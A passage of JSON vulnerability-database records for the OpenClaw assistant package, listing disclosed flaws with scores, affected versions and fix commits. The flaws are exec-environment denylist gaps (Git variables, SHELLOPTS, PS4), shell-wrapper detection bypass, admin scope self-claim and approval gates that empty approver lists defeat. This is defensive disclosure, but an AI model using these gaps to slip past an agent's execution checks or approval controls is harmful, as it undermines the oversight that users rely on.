"https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events" }, { "reference_url": "https://github.com/advisories/GHSA-57r2-h2wj-g887", "reference_id": "GHSA-57r2-h2wj-g887", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-57r2-h2wj-g887" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "CVE-2026-44999", "GHSA-57r2-h2wj-g887" ], "risk_score": 2.9, "exploitability": "0.5", "weighted_severity": "5.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2c8p-gbaw-3ye4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90094?format=api", "vulnerability_id": "VCID-2h6a-becf-x7ej", "summary": "OpenClaw: GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant)\n## Impact\n\nGIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant).\n\nGit plumbing environment variables were not removed before host exec and could redirect Git operations.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.3.30`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41915", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04648", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04661", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04675", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41915" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41915", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41915" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "2.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment" }, { "reference_url": "https://github.com/advisories/GHSA-cm8v-2vh9-cxf3", "reference_id": "GHSA-cm8v-2vh9-cxf3", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cm8v-2vh9-cxf3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-41915", "GHSA-cm8v-2vh9-cxf3" ], "risk_score": 2.6, "exploitability": "0.5", "weighted_severity": "5.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2h6a-becf-x7ej" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91183?format=api", "vulnerability_id": "VCID-2hca-3v8f-f3e8", "summary": "OpenClaw: Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n## Summary\n\nGateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBackend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowing non-admin operators to reconnect as `operator.admin`. Commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` removes the backend self-pairing skip and requires pairing when requested scopes exceed the approved baseline.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`.\n\n## Fix Commit(s)\n\n- `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35663", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15986", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1603", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.1604", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35663" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35663", "reference_id": "CVE-2026-35663", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35663" }, { "reference_url": "https://github.com/advisories/GHSA-9hjh-fr4f-gxc4", "reference_id": "GHSA-9hjh-fr4f-gxc4", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9hjh-fr4f-gxc4" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim", "reference_id": "openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35663", "GHSA-9hjh-fr4f-gxc4" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2hca-3v8f-f3e8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89219?format=api", "vulnerability_id": "VCID-2khh-wv8p-97ff", "summary": "OpenClaw: Shell-wrapper detection missed env-argv assignment injection forms\n## Summary\n\nShell-wrapper detection missed env-argv assignment injection forms.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.22 < 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nExec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls.\n\n## Technical Details\n\nThe fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy.\n\n## Fix\n\nThe issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab`\n- PR: #65717\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @decsecre583 for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42435", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00108", "scoring_system": "epss", "scoring_elements": "0.28675", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00124", "scoring_system": "epss", "scoring_elements": "0.31153", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00124", "scoring_system": "epss", "scoring_elements": "0.31188", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42435" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8f8492d172f4c5b4fd7dd9a47855ed620c8770ab" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/65717", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/65717" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j6c7-3h5x-99g9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42435", "reference_id": "CVE-2026-42435", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42435" }, { "reference_url": "https://github.com/advisories/GHSA-j6c7-3h5x-99g9", "reference_id": "GHSA-j6c7-3h5x-99g9", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j6c7-3h5x-99g9" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection", "reference_id": "openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:30:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-shell-wrapper-detection-bypass-via-environment-variable-assignment-injection" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api", "purl": "pkg:npm/openclaw@2026.4.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12" } ], "aliases": [ "CVE-2026-42435", "GHSA-j6c7-3h5x-99g9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2khh-wv8p-97ff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89236?format=api", "vulnerability_id": "VCID-2mxq-krq5-bycx", "summary": "OpenClaw: Empty approver lists could grant explicit approval authorization\n## Summary\n\nEmpty approver lists could grant explicit approval authorization.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.12`\n- Patched versions: `>= 2026.4.12`\n\n## Impact\n\nFor helper-backed channels, an empty resolved approver list could be interpreted as explicit approval authorization, allowing a sender outside the normal channel authorization gate to resolve pending approvals if they knew an approval id.\n\n## Technical Details\n\nThe fix prevents empty approver lists from granting explicit approval authorization and adds regression coverage for unauthorized senders.\n\n## Fix\n\nThe issue was fixed in #65714. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `0a105c0900de701d2ee9f1abc96b017afbd0afdd`\n- PR: #65714\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43574", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09702", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11327", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11359", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43574" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/0a105c0900de701d2ee9f1abc96b017afbd0afdd" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/65714", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": 